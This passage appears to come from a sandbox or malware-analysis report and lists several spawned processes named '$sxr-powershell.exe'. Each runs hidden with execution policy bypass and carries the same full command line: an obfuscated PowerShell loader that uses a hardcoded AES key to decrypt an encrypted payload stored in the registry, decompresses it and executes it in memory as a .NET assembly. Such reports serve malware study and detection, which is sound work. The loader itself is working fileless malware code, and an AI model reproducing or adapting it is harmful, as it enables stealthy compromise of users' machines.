'').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        12⤵
        
        PID:6344
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        12⤵
        
        PID:1756
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        12⤵
        
        PID:2608
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        12⤵
        
        PID:5208
        
        C:\Windows\$sxr-powershell.exe
        
